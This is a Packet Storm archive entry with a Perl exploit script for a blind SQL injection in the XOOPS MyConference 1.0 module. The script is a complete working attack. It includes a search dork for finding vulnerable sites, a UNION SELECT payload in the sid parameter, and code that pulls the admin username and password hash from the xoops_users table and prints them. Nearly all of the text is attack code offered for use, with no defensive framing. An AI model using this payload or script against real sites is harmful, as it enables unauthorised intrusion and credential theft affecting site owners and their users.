xoops10-sql.txt

2007-05-17T00:00:00
ID PACKETSTORM:56784
Type packetstorm
Reporter ajann
Modified 2007-05-17T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#[Script Name: XOOPS Module MyConference 1.0 (index.php) Remote BLIND SQL Injection Exploit  
#[Coded by : ajann  
#[Author : ajann  
#[Contact : :(  
#[Dork : "inurl:/modules/myconference/"  
#[S.Page : http://dev.xoops.org/modules/xfmod/project/?group_id=1072  
#[$$ : Free  
#[.. : ajann,Turkey  
  
  
use IO::Socket;  
if(@ARGV < 1){  
print "  
[========================================================================  
[// XOOPS Module MyConference 1.0 (index.php) Remote BLIND SQL Injection Exploit  
[// Usage: exploit.pl [target]  
[// Example: exploit.pl victim.com  
[// Example: exploit.pl victim.com  
[// Vuln&Exp : ajann  
[========================================================================  
";  
exit();  
}  
#Local variables  
$kapan = "/*";  
$server = $ARGV[0];  
$server =~ s/(http:\/\/)//eg;  
$host = "http://".$server;  
$port = "80";  
$file = "/modules/myconference/index.php?sid=";  
  
print "Script <DIR> : ";  
$dir = <STDIN>;  
chop ($dir);  
  
if ($dir =~ /exit/){  
print "-- Exploit Failed[You Are Exited] \n";  
exit();  
}  
  
if ($dir =~ /\//){}  
else {  
print "-- Exploit Failed[No DIR] \n";  
exit();  
}  
  
print "User ID (uid): ";  
$id = <STDIN>;  
chop ($id);  
  
$target = "-1%20union%20select%20concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass,char(98,105,116,101,114))%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;  
$target = $host.$dir.$file.$target;  
  
#Writing data to socket  
print "+**********************************************************************+\n";  
print "+ Trying to connect: $server\n";  
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";  
print $socket "GET $target HTTP/1.1\n";  
print $socket "Host: $server\n";  
print $socket "Accept: */*\n";  
print $socket "Connection: close\n\n";  
print "+ Connected!...\n";  
#Getting  
while($answer = <$socket>) {  
if ($answer =~ /username:(.*?)pass/){  
print "+ Exploit succeed! Getting admin information.\n";  
print "+ ---------------- +\n";  
print "+ Username: $1\n";  
}  
  
if ($answer =~ /password:(.*?)biter/){  
print "+ Password: $1\n";  
}  
  
if ($answer =~ /Syntax error/) {   
print "+ Exploit Failed : ( \n";  
print "+**********************************************************************+\n";  
exit();   
}  
  
if ($answer =~ /Internal Server Error/) {  
print "+ Exploit Failed : ( \n";  
print "+**********************************************************************+\n";  
exit();   
}  
}  
`